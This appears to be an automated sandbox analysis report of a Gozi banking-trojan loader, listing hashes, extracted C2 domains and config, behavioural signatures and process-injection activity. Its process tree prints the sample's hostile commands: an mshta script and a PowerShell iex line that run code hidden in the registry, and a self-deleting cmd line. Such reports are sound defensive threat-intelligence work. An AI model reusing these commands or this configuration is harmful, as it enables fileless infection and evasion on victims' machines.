Analysis
-
max time kernel
150s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
16-11-2022 01:07
Behavioral task
behavioral1
Sample
main.exe
Resource
win7-20221111-en
General
-
Target
main.exe
-
Size
37KB
-
MD5
9676298f24c8cdd4b532ac027a00f60e
-
SHA1
8d0bd57712533f1a889627706925c17ed4347ce5
-
SHA256
0f5cce66023859e9d7e3f54b78e95bf09618db5ed01fe05b765d76ab156271da
-
SHA512
525b70896530a60cf58de64e8052ef2a8eb5ccc73d86fcd1f55d4850e682e3ff44c7ebc18ab029fc479b75a9a0083765c314c542b356d7ef8a7e7e493f13e7fd
-
SSDEEP
768:/QLm41fM01vAqyRrlpItKFyr8MS1g7/s1w70anLq:/L41fMSvXArbYVrO0/saLq
Malware Config
Extracted
gozi
5
lentaphoto.at
iujdhsndjfks.ru
gameindikdowd.ru
jhgfdlkjhaoiu.su
-
base_path
/uploaded/
-
build
250246
-
exe_type
loader
-
extension
.pct
-
server_id
50
Extracted
gozi
5
lentaphoto.at
iujdhsndjfks.ru
gameindikdowd.ru
jhgfdlkjhaoiu.su
-
base_path
/uploaded/
-
build
250246
-
exe_type
worker
-
extension
.pct
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 4228 set thread context of 1084 4228 powershell.exe Explorer.EXE PID 1084 set thread context of 3508 1084 Explorer.EXE RuntimeBroker.exe PID 1084 set thread context of 3740 1084 Explorer.EXE RuntimeBroker.exe PID 1084 set thread context of 4648 1084 Explorer.EXE RuntimeBroker.exe PID 1084 set thread context of 4008 1084 Explorer.EXE cmd.exe PID 4008 set thread context of 4556 4008 cmd.exe PING.EXE PID 1084 set thread context of 3500 1084 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 4556 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
main.exepowershell.exeExplorer.EXEpid process 4944 main.exe 4944 main.exe 4228 powershell.exe 4228 powershell.exe 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE -
Suspicious behavior: MapViewOfSection 7 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 4228 powershell.exe 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 1084 Explorer.EXE 4008 cmd.exe 1084 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 4228 powershell.exe Token: SeShutdownPrivilege 1084 Explorer.EXE Token: SeCreatePagefilePrivilege 1084 Explorer.EXE Token: SeShutdownPrivilege 1084 Explorer.EXE Token: SeCreatePagefilePrivilege 1084 Explorer.EXE Token: SeShutdownPrivilege 1084 Explorer.EXE Token: SeCreatePagefilePrivilege 1084 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 1084 Explorer.EXE -
Suspicious use of WriteProcessMemory 42 IoCs
Processes:
mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 3416 wrote to memory of 4228 3416 mshta.exe powershell.exe PID 3416 wrote to memory of 4228 3416 mshta.exe powershell.exe PID 4228 wrote to memory of 1204 4228 powershell.exe csc.exe PID 4228 wrote to memory of 1204 4228 powershell.exe csc.exe PID 1204 wrote to memory of 3244 1204 csc.exe cvtres.exe PID 1204 wrote to memory of 3244 1204 csc.exe cvtres.exe PID 4228 wrote to memory of 996 4228 powershell.exe csc.exe PID 4228 wrote to memory of 996 4228 powershell.exe csc.exe PID 996 wrote to memory of 4668 996 csc.exe cvtres.exe PID 996 wrote to memory of 4668 996 csc.exe cvtres.exe PID 4228 wrote to memory of 1084 4228 powershell.exe Explorer.EXE PID 4228 wrote to memory of 1084 4228 powershell.exe Explorer.EXE PID 4228 wrote to memory of 1084 4228 powershell.exe Explorer.EXE PID 4228 wrote to memory of 1084 4228 powershell.exe Explorer.EXE PID 1084 wrote to memory of 3508 1084 Explorer.EXE RuntimeBroker.exe PID 1084 wrote to memory of 3508 1084 Explorer.EXE RuntimeBroker.exe PID 1084 wrote to memory of 4008 1084 Explorer.EXE cmd.exe PID 1084 wrote to memory of 4008 1084 Explorer.EXE cmd.exe PID 1084 wrote to memory of 4008 1084 Explorer.EXE cmd.exe PID 1084 wrote to memory of 3508 1084 Explorer.EXE RuntimeBroker.exe PID 1084 wrote to memory of 3508 1084 Explorer.EXE RuntimeBroker.exe PID 1084 wrote to memory of 3740 1084 Explorer.EXE RuntimeBroker.exe PID 1084 wrote to memory of 3740 1084 Explorer.EXE RuntimeBroker.exe PID 1084 wrote to memory of 3740 1084 Explorer.EXE RuntimeBroker.exe PID 1084 wrote to memory of 3740 1084 Explorer.EXE RuntimeBroker.exe PID 1084 wrote to memory of 4648 1084 Explorer.EXE RuntimeBroker.exe PID 1084 wrote to memory of 4648 1084 Explorer.EXE RuntimeBroker.exe PID 1084 wrote to memory of 4648 1084 Explorer.EXE RuntimeBroker.exe PID 1084 wrote to memory of 4648 1084 Explorer.EXE RuntimeBroker.exe PID 1084 wrote to memory of 4008 1084 Explorer.EXE cmd.exe PID 1084 wrote to memory of 4008 1084 Explorer.EXE cmd.exe PID 4008 wrote to memory of 4556 4008 cmd.exe PING.EXE PID 4008 wrote to memory of 4556 4008 cmd.exe PING.EXE PID 4008 wrote to memory of 4556 4008 cmd.exe PING.EXE PID 4008 wrote to memory of 4556 4008 cmd.exe PING.EXE PID 4008 wrote to memory of 4556 4008 cmd.exe PING.EXE PID 1084 wrote to memory of 3500 1084 Explorer.EXE cmd.exe PID 1084 wrote to memory of 3500 1084 Explorer.EXE cmd.exe PID 1084 wrote to memory of 3500 1084 Explorer.EXE cmd.exe PID 1084 wrote to memory of 3500 1084 Explorer.EXE cmd.exe PID 1084 wrote to memory of 3500 1084 Explorer.EXE cmd.exe PID 1084 wrote to memory of 3500 1084 Explorer.EXE cmd.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\main.exe"C:\Users\Admin\AppData\Local\Temp\main.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>D03n='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(D03n).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\51C98FB5-7C72-AB2B-0E15-700F2219A4B3\\\TypePack'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vwoehytn -value gp; new-alias -name sxogiw -value iex; sxogiw ([System.Text.Encoding]::ASCII.GetString((vwoehytn "HKCU:Software\AppDataLow\Software\Microsoft\51C98FB5-7C72-AB2B-0E15-700F2219A4B3").VirtualWhite))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wqc0pj5w\wqc0pj5w.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6992.tmp" "c:\Users\Admin\AppData\Local\Temp\wqc0pj5w\CSCE0E47F3140F1453FB942649E8633FE.TMP"5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g4yz3ulg\g4yz3ulg.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A6D.tmp" "c:\Users\Admin\AppData\Local\Temp\g4yz3ulg\CSC1B531F9EE47F45A8B7CEEC91AA512F2.TMP"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\main.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES6992.tmpFilesize
1KB
MD5af0d0eeafdf1e8f932b25f20344dbad7
SHA1531cf800fb1b21d14e36b21b40835cc66103739e
SHA2562060367006a04a9be7b9dae81e3c5a0e45d73f52a13b349e342b1e243ef70bd2
SHA512591c5a088a20a8bc30c17b55eca6690a99cf603ad8d74c647befcff2b01b4879299f6457bf0d2b3e693bfc7cd6474bad002ebf9de4934979d13ccf32be8af132
-
C:\Users\Admin\AppData\Local\Temp\RES6A6D.tmpFilesize
1KB
MD5007ea5e941c24074b76ad45c7e364d34
SHA1333c93cc6f7fff893b2adccc6e235ddc6a24abd1
SHA2566f0a8a10dcc77b6995ef6ef8e86f0990e3f6a355a9b65309abd375189c0b33ec
SHA512889774824610b5ea435fef6197143625f70b37aef0bf7c6d89224420020cf20ea83cb9534a5c25b7719cd834a7d12981b79647c318096a30e6cc2f8abb00f3d5
-
C:\Users\Admin\AppData\Local\Temp\g4yz3ulg\g4yz3ulg.dllFilesize
3KB
MD54234e22e2bae89f64b923187f5734b62
SHA1067de0ea7d10858d3d137e53eb486de8e831a89b
SHA2560cbc160e22ccdc1375edc36a25a4b44bcfbb4313981776284101ceff925894bd
SHA512a6061fbf8860615515a996dbe7aad4450747d93e4f5b120cf8ab8477e91bc85f018e8e3a24eb22f56aeb3fac54c150a0d04e7d88ae3cf68793b0bc4ade3bca63
-
C:\Users\Admin\AppData\Local\Temp\wqc0pj5w\wqc0pj5w.dllFilesize
3KB
MD5ba8ff6055057a6f4e3b7226022c09687
SHA1b36c591421286bb5f40299ea28ce535a7a76d20f
SHA256adf02eb2256f14eb9128d49c4d5b52c53665fce03ca4ce267e023d7e0c802ab9
SHA512218f432cbbdabf4a962bdd0d01883f51c4552d796054cac0c55e29be7cbda22d5ad9fad7403e167f71b006b400bea40aba2f8d27cdd63da01f7acef0c3d16fc0
-
\??\c:\Users\Admin\AppData\Local\Temp\g4yz3ulg\CSC1B531F9EE47F45A8B7CEEC91AA512F2.TMPFilesize
652B
MD57ba068372537eb05004898ed589974f6
SHA160c88307979734b869515cd08e47af7669a48810
SHA25674667b95f0f4344540f3c9abdd97f03d623ab196d5060285996541b5ed8188ee
SHA51238e069229645bde7f764f46bc88462f23975533cb664c7a62e1c23a5f7c22676bbaafb94d1e981faa7c053c2faea0290518c21fc838c1c39460d6646b657593a
-
\??\c:\Users\Admin\AppData\Local\Temp\g4yz3ulg\g4yz3ulg.0.csFilesize
400B
MD5f31a91cb873d422f30e84bfc6f0e4919
SHA187946e5b050bc8c66c9f04ebb9f82e210522d8ee
SHA25691af8fc99b650c87f7c49faa1e0499f673e034ed712eb62782cfacbdf8329f84
SHA512242e12d8c01ef5bf6866fc09bd8a4ab9fb6c7ea1ac4bead56610db30f15f0c7b38d7da8706ab4bb8ad5647d5b2ccfb9717b85324ca0099c6dcdd7fde13e5906b
-
\??\c:\Users\Admin\AppData\Local\Temp\g4yz3ulg\g4yz3ulg.cmdlineFilesize
369B
MD51379b550f897257adb4635bb8a1678b5
SHA12e9bf0e3de95ff9498268ebb31053587a1002c44
SHA256634df9805c739d897529ac254c4821d5950ffa01fe9ad49c74d6ab1cb0f78d23
SHA512321c93f1a4e021df87b2c075015f40845f704954f37ca4dbb7f0f7770cb6d98de24b33876b2343037b66e4ac03e03327f06d07d06b27804895a7058f11dc7fe7
-
\??\c:\Users\Admin\AppData\Local\Temp\wqc0pj5w\CSCE0E47F3140F1453FB942649E8633FE.TMPFilesize
652B
MD580ad41a139ea822ce86fe944b0458936
SHA1c0eaac9ab3b626c4701d17bef80d3e6df02a7f3e
SHA25633577dbe6ff7e6ec03f7c2c22e12f83324970356f64081b70f56e03a2d4a5d14
SHA512dd04bb817bd08624935778185ec3da64e5739f02e478d4a9ca27db428624492d58fb388e7f393bf43833c6f8ec858bf3a563db310c8f7289dfae3a76efaead5a
-
\??\c:\Users\Admin\AppData\Local\Temp\wqc0pj5w\wqc0pj5w.0.csFilesize
418B
MD519fd6f555ad7c58d574c00f46f087b02
SHA1025ec4778721f20fdbff775edd2351baea93846c
SHA2569d08df39ad05bd4a53f416ab8ef6a2fca313eb9a1498e451284b445bb1830dac
SHA512188488549588e593523ddab3a8372d47e016841c3ce1594a456c0ac7c73763a3ae1e8a5fffdc7b6455bd869d0f6bdebd6b6bcb2aa6a6b4cf658231ce72dc40b9
-
\??\c:\Users\Admin\AppData\Local\Temp\wqc0pj5w\wqc0pj5w.cmdlineFilesize
369B
MD52e943d0de9f4037468d2e731faa50eca
SHA1228278c99209c38c065086da07ffa0f006efcff5
SHA256fd22c3e5cb26eabdf16204adaea75295c8301d0838a800a8cd631de4f19d6de2
SHA512a417e201a3d201801bdb991367bd79e15034e25c752f9600788e43883d14095cbc6c052029d82a12f4f787d3fb6f80dc1585d5e48a3526f68651a4c1b10d009a
-
memory/996-146-0x0000000000000000-mapping.dmp
-
memory/1084-167-0x0000000007BF0000-0x0000000007C93000-memory.dmpFilesize
652KB
-
memory/1084-159-0x0000000007BF0000-0x0000000007C93000-memory.dmpFilesize
652KB
-
memory/1204-139-0x0000000000000000-mapping.dmp
-
memory/3244-142-0x0000000000000000-mapping.dmp
-
memory/3500-164-0x0000000000A70000-0x0000000000B06000-memory.dmpFilesize
600KB
-
memory/3500-163-0x0000000000556B20-0x0000000000556B24-memory.dmpFilesize
4B
-
memory/3500-162-0x0000000000000000-mapping.dmp
-
memory/3508-156-0x0000022737F20000-0x0000022737FC3000-memory.dmpFilesize
652KB
-
memory/3740-158-0x000001D91F4A0000-0x000001D91F543000-memory.dmpFilesize
652KB
-
memory/4008-166-0x0000022E1B560000-0x0000022E1B603000-memory.dmpFilesize
652KB
-
memory/4008-153-0x0000000000000000-mapping.dmp
-
memory/4008-161-0x0000022E1B560000-0x0000022E1B603000-memory.dmpFilesize
652KB
-
memory/4228-154-0x00007FFECE930000-0x00007FFECF3F1000-memory.dmpFilesize
10.8MB
-
memory/4228-155-0x000001F7BDBE0000-0x000001F7BDC1D000-memory.dmpFilesize
244KB
-
memory/4228-136-0x0000000000000000-mapping.dmp
-
memory/4228-137-0x000001F7A3350000-0x000001F7A3372000-memory.dmpFilesize
136KB
-
memory/4228-138-0x00007FFECE930000-0x00007FFECF3F1000-memory.dmpFilesize
10.8MB
-
memory/4556-157-0x0000000000000000-mapping.dmp
-
memory/4556-165-0x0000024B0E720000-0x0000024B0E7C3000-memory.dmpFilesize
652KB
-
memory/4648-160-0x00000212DFA40000-0x00000212DFAE3000-memory.dmpFilesize
652KB
-
memory/4668-149-0x0000000000000000-mapping.dmp
-
memory/4944-132-0x0000000000570000-0x000000000057D000-memory.dmpFilesize
52KB